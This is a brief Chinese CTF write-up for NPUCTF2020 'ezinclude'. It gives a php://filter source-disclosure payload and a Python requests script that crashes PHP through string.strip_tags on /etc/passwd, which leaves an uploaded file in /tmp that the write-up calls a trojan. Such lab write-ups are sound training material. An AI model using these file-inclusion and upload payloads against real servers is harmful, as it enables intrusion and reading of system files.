[NPUCTF2020]ezinclude
f12查看源码发现哈希长度拓展攻击,并发现了hash值
抓包查看一下,发现bp也给了hash
直接pass一下,发现了flflflflag.php
进入flflflflag.php查看一下
发现了404.html,在网页进入的时候真的就出现了404
用伪协议读一下源码:
/flflflflag.php?file=php://filter/read=convert.base64-encode/resource=flflflflag.php
base64解密得到源码,发现过滤了data、input、zip
这时候可以利用:php://filter/string.strip_tags来导致php崩溃,但是可以上传文件保存在/tmp目录,我们直接上传木马,脚本小子火速出击:
import requests
from io import BytesIO
url = "http://daf37d2a-5017-47b7-a42b-71db66a88c63.node4.buuoj.cn:81/flflflflag.php?file=php://filter/string.strip_tags/resource=/etc/passwd"
phpfile = "<?php phpinfo(); ?>"
filedata = {
"file":phpfile
}
bak = requests.post(url=url, files=filedata)
print(bak.text)
运行了之后,不出意外的页面崩溃了:
进入dir.php查看发现木马已上传:
bp直接查看即可得到flag